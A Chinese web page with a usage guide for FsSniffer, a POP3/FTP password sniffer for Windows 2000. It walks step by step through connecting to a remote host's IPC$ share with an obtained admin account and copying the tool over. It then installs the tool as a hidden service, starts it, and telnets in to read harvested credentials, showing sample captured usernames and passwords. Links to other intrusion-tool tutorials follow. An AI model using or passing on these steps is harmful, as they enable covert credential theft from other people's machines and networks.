首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

流影 POP3/FTP Sniffer 说明

所属分类: 网络安全 / 工具使用 阅读数: 101
收藏 0 赞 0 分享
FsSniffer只能在Windows 2000中使用,可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP:指绑定的IP地址,通常就是本地主机IP地址。Port:控制的端口,以后要通过这个端口登陆上去查看结果。Control Password:登陆时的密码。登陆上去后的命令Show Result:查看捕获的记录Quit:退出ShutDown:结束Sniffer的运行二、远程使用例如:得到主机211.152.188.1的一个属于管理员组的帐号test:test,首先登录。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.将fssniffer.exe复制到远程主机。(也可以用流光IV中提供的工具“种植者”来做这件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied. 利用流光IV中的NTCMD启动FsSniffer.EXE,并将器安装成为服务=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http://www.netXeyes.com http://www.netXeyes.orgNTCMD>verMicrosoft Windows 2000 [Version 5.00.2195]NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001TestSniffer1 installed. NTCMD> 这样在远程主机上面安装了一个服务ShadowSniffer。用net命令启动服务NTCMD>net start shadowsnifferThe ShadowSniffer service is starting..The ShadowSniffer service was started successfully.安装成为服务的格式:FsSniffer -I <Username> <Password> <Service Name> <Bind Local IP> <Port> <Control Password>UserName:远程主机的用户名(必须具有超级用户权限)Passwod:远程主机的密码Service Name:安装的服务名称,如果安装失败,可以将FsSniffer.exe改名再试。Bind Local IP:远程主机的IP。某些主机具有两个IP地址,这是就需要根据需要选择监听的IP地址(例如:局域网和外网)Port:远程控制的端口Control Password:远程控制的密码过一段时间就可以登陆到FsSniffer开的端口7上面,查看结果了。D:>telnet 211.152.188.1 7Control Password: **************===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================Written by Assassin, Server Edition FluxShadow@21cn.com==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕软件实验室&#8482; 1995-2001版权所有www.netXeyes.com www.netXeyes.orgdansnow@21cn.com
更多精彩内容其他人还在看

lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

这篇文章主要介绍了lcx端口转发详细介绍及使用方法(lcx内网转发姿势),需要的朋友可以参考下
收藏 0 赞 0 分享

lcx用法之心得总结(piracy)

这篇文章主要介绍了lcx用法之心得总结,需要的朋友可以参考下
收藏 0 赞 0 分享

SQLMAP注入检查方法 11种常见SQLMAP使用方法详解

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,很多人都是通过这个工具实施的检测与注入,对于我们从事安全防御的人来说,一定要引起注意,一般的程序员写的代码都是带漏洞的
收藏 0 赞 0 分享

nmap命令 基础用法附官方手册

Nmap是一款网络扫描和主机检测的非常有用的工具。Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统
收藏 0 赞 0 分享

reDuh 简单使用说明

看到Sai52兄弟写出了这个内网渗透工具的使用教程,于是请教此工具优于Lcx的地方, 得到答复是: 只要对方的网页能访问就可用,即使目标是在路由器映射端口或者防火墙后,不需更改任何设置就可用. 而Lcx并不能达到这个效果.下面转Sai52兄弟的文章. --------------
收藏 0 赞 0 分享

让自解压文件在右键中不显示的实现方法

自解压文件在右键中不显示 解压到 我们创建自解压文件后就算更改图标,当你右键单击时会显示 解压文件等选项,一看就知道是自解压文件,下面说一种方法让它不显示:    用C32载入搜索十六进制807A0272,把72改成AA,然后再搜索526172211A07,把72改成AA.当然
收藏 0 赞 0 分享

rar.exe 在提权中的妙用

rar.exe是什么?它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件,比如:SU目录。
收藏 0 赞 0 分享

MT.EXE 中文使用教程

MT.EXE是一个网络管理方面的软件,依照yy3的说法,也就是 “七拼八凑来的,纯粹是图个方便。”可是这个方便个真的是太方便了,有了这40K的一个程序,可以删除我们电脑里面多达几M的程序,让我们先来看看这个程序的真面目吧
收藏 0 赞 0 分享

使用CA和CCA克隆账户与检查账号是否被克隆工具的方法

克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account\Users下的子键名,另一处是该子键的子项F的值中。
收藏 0 赞 0 分享

在线破解各类加密密码地址( 干掉收费cmd5)

在网上收集到的一些在线破解各类加密方式的地址,感觉效果不错,分享给大家,每次用cmd5都要收费,郁闷死我了,这些网站中有些是国外网站,需要翻墙,大家可以百度下
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-18